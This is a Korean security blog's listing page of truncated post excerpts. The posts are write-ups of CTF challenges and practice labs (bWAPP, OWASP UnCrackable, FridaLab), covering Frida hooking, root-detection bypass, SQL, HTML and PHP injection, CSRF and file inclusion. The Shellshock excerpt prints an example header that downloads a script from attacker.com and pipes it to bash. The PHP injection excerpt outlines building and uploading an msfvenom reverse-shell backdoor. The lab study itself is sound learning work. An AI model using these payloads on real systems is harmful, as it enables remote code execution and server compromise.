금번 포스트는 드림핵 웹 CTF 문제인 Test Your Luck 문제를 풀이한다 . 1. 문제 검색링크로 들어 갈 시 Test Your Luck 이라는 인풋창과 반환값은 10초 뒤에 나온다는 문구가 적혀있음해당 페이지를 크롬 개발자 도구로 소스를 볼 시 태그 안 Post 요청을 보내는 메소드를 확인 할 수 있는데 매 요청 시 10초의 타임아웃이 걸리고 /guess 라는 url로 요청을 보내는 것 을 확인 할 수 있음.서버 코드는 유저의 입력값을 받아 랜덤 한 값과 비교하여 맞을 시에 플래그를 출력해주는 기능을 함.2. 문제풀이외부에서 요청을 보내 타임아웃 우회 및 브루트 포스 공격시도 2.1. 브루트포스를 위한 코드 제작 및 공격tqdm 을 통한 실시간 진행사항 확인 및 브루트 포스 공격 import ..
분류 전체보기
🔍 실습 목표OWASP의 안드로이드 보안 학습 앱인 UnCrackable Level 1을 대상으로,Frida를 활용해 앱 내부의 함수 로직을 후킹하고,UI를 통해 입력된 값을 검증하는 비밀키 비교 로직을 분석 및 복호화하는 것이 목적임.이를 통해 동적 분석 기법 및 런타임 코드 조작에 대한 실습 경험을 쌓는 것이 목표임.📦 앱 개요앱명: UnCrackable Level 1패키지명: owasp.mstg.uncrackable1실행 환경: 루팅된 기기에서 실행 시 종료됨주요 특징:루팅 탐지 기능이 포함되어 있어, Frida 사용 전 우회가 필요함특정 문자열 입력 시 내부적으로 비밀키 비교가 수행되며, 일치 여부에 따라 "Success!" 또는 "Try again." 메시지를 출력함비밀키는 하드코딩되어 있지..
UnCrackable Level 1 실습 – Frida로 안드로이드 앱 후킹🔍 실습 목표OWASP에서 제공하는 안드로이드 보안 실습 앱인 UnCrackable Level 1을 대상으로,Frida를 활용해 루팅 탐지를 우회하고 앱의 내부 로직을 분석해보는 것임.📦 앱 개요앱명: UnCrackable Level 1패키지명: owasp.mstg.uncrackable1실행 환경: 루팅 디바이스에서 실행 시 자동 종료됨이 앱은 루팅된 환경을 탐지하고 종료시키는 보안 로직이 탑재되어 있어,보안 우회 기법을 익히기에 적절한 실습 대상임.루팅 탐지 우회앱을 실행하면 아래와 같은 메시지를 출력하며 종료됨:"Root detected! App is closing..."내부적으로는 다음과 같은 조건들을 체크함:Build...
취약점PHP Code Injection위험도상상세경로( URL )192.168.2.9/bWAPP/phpi.php취약점 시나리오[1단계] 시스템 명령어 실행 가능 여부 확인웹 페이지 상에서 사용자 입력을 통해 시스템 명령어(`whoami`, `id` 등)의 실행이 가능한 것을 확인함.이는 명령어 삽입(Command Injection) 취약점에 해당하며, 시스템 권한 탈취의 첫 단초가 됨. [2단계] `msfvenom`을 활용한 백도어 생성공격자는 `msfvenom` 도구를 활용해 리버스 셸 형식의 백도어 파일 생성. 해당 코드 블록은 아래 테이블 참조.생성된 파일은 ELF 포맷으로, 리눅스 기반 서버에서 실행 가능함. [3단계] 웹 서버로 백도어 업로드취약한 파일 업로드 기능 혹은 명령어 삽입을 통해 `b..
취약점SQL Injection / GET, POST위험도상상세경로( URL )192.168.2.9/bWAPP/sqli_1.php || sqli_6.php취약점 개요SQL Injection은 사용자 입력값이 데이터베이스 쿼리에 직접 삽입될 때 발생하는 취약점으로, 공격자가 악의적인 SQL 명령을 주입해 인증 우회, 데이터 조회 및 조작 등이 가능함. 입력값 검증 없이 SQL 쿼리에 포함되면 쿼리 구조가 조작되어 의도치 않은 결과를 초래하게 됨. Prepared Statement 사용, 입력값 이스케이프, 화이트리스트 검증 등을 통해 방어할 수 있음.수행 결과 7.1) GET 요청에서 따옴표와 주석을 사용한 악의적인 SQL문 동작수행 점검그림 7.1.1 – GET 요청 테이블의 정상 동작 모습 > 그림 7...
1. HTML Injection – Reflected ( GET )취약점HTML Injection – Reflected ( GET )위험도상상세경로( URL )192.168.2.9/bWAPP/htmli_get.html취약점 개요사용자의 입력값이 필터링 없이 HTML에 삽입되어, 태그나 스크립트가 그대로 실행되는 취약점, GET 방식으로 전달된 파라미터가 즉시 반영되며, XSS로 이어질 수 있어 위험함으로.htmlspecialchars() 등으로 출력 시 이스케이프 처리해 예방권고수행 결과1.1) Input Box 에서 HTML 태그를 삽입하였을 시 화면 표출 점검그림 1.1.1 - Input Box HTML 태그 삽입 > 그림 1.1.2 - HTML 태그가 인코딩 되어 전달되는 모습 >그림 1.1.3..
금번엔 프리다랩에서 제공해주는 취약점 문제 apk를 가지고 문제 풀이를 진행하려고함프리다랩 apk는 하기의 사이트에서 제공해줌https://rossmarks.uk/blog/fridalab/ FridaLabI was struggling with a recent test using frida, knowing it could do what I want but unsure how. After lots of googling and trial and error I eventually got it working. So I decidedrossmarks.uk 준비물 1. 프리다가 설치 된 파이썬 가상환경2. jadx3. 녹스 플레이어4. fridalab.apk 프리다랩 세팅1. 프리다랩 설치 1.1. 받은 프리다랩 a..
■ Shell Shock - 발견 시기 : 2014년- 영향받는 프로그램 : Bash ( 리눅스/유닉스에서 기본적으로 쓰이는 쉘)- 취약점 번호 : CVE-2014-6271 외 다수- 설명 :Bash가 환경변수에 악성 코드를 몰래 심을 수 있게 허술하게 파싱하여 이로 비롯해 서버에 악성 환경변수만 심어주면, 원격 코드 실행 (RCE) 가능웹서버, SSH, DHCP 서버 같은 Bash 를 사용하는 프로그램 위협 공격 예시User-Agent: () { :; }; /bin/bash -c "curl http://attacker.com/malware.sh | bash"■ 대상- shell shock 취약점이 있는 사이트- 힌트에 referer header 에 취약점이 있다는 것을 알 수 있음 referer hea..
🎯 Frida란?Frida는"동적 바이너리 인스트루먼테이션(dynamic binary instrumentation)" 툴 쉽게 말하면,앱(또는 프로그램)이 실행 중일 때메모리, 함수, 변수 등에 마음대로 간섭하고 조작할 수 있는 도구 준비물- Nox app player - conda ( conda navigator ) - python 3.12.7- frida 16.4.7 본 게시물은 nox와 conda 가 설치 되어있음을 가정 한 글설치1. conda를 통해 파이썬 독립환경을 구성하였다는 가정 하에 하기에 명렁어로 프리다 설치, 및 버전확인pip install frida-tools 2. nox_adb shell 로 모바일 환경 접속 후 아래 명령어로 아키텍처 확인> nox_adb shell> getp..
금일은 앱 해킹을 위한 Nox 설치를 진행해볼 것 왜 녹스인가 ?루팅(Rooting)이 쉽다Nox 설정에서 "루팅 활성화" 버튼만 누르면 끝.→ 물리 디바이스 루팅처럼 번거롭게 안 해도 됨.루팅된 상태니까 앱 파일, 메모리, 시스템 파일 접근이 자유로움.APK 파일 추출이 간편하다Nox 파일 시스템에서 바로 .apk 파일 꺼낼 수 있어.디컴파일해서 분석하거나 리패키징할 때 편함.PC환경에서 분석할 수 있다Nox는 가상 안드로이드 머신이라, PC용 디버깅 툴(FRIDA, Objection, BurpSuite 등) 쉽게 연결 가능.스크립트 작업이나 패킷 캡처할 때 훨씬 안정적.스냅샷 기능작업 전후 상태를 스냅샷으로 저장할 수 있어서, 실수했을 때 바로 복구 가능.이거 실제 디바이스에선 매우 귀찮음.네트워크 ..
CSRF ( CROSS SITE REQUEST FORGERY, 사이트 간 위조 요청 )- 공격자가, 사용자가 사용하고 있는 브라우저를 이용해, 공격자가 조작한 HTTP Request를 웹서버에 보내는 공격방법■ 대상하기의 페이지는 로그인 된 사용자의 비밀번호를 변경하는 평범한 사이트, 해당 사이트를 버프 스위트로 프록시를 잡아보면 비밀번호 변경 요청에 대한 내용이 그대로 드러나는 것을 볼 수 있음■ 공격버프 스위트에 존재하는 HTML element Injection Brog 페이지로 넘어가 이미지 태그를 사용하여 악의적인 공격 수행 1. Img 태그를 사용한 공격- 이미지의 노출을 방지하기 위해 가로,세로폭을 0으로 줌 2. a 태그를 사용한 공격- a 태그를 사용하여 악의적인 링크를 생성할 수 있음..
LFI (Local File Inclusion)로컬 파일 포함 취약점서버에 존재하는 파일을 공격자가 포함시켜 실행하거나 내용을 확인하는 공격 RFI (Remote File Inclusion)원격 파일 포함 취약점공격자가 자신의 서버에 올려둔 파일을 불러와서 실행하게 만드는 방식■ 대상- 하기에 페이지는 이전 File traversal 취약점과 유사하게 FILE PATH 또는 FORDER PATH 로 컴퓨터 내부의 의도치 않은 내부 파일들을 열람할 수 있음, 해당 사이트에 위에서 상술한 외부에서 파일을 불러와 발생하는 RFI 취약점 공격을 해볼 것 임■ 공격1. 사전 공격 파일 작성- BWAPP 은 php 로 동작하기에 공격을 수행하기 위한 소스코드 작성간단한 alert 과 php system 함수를 ..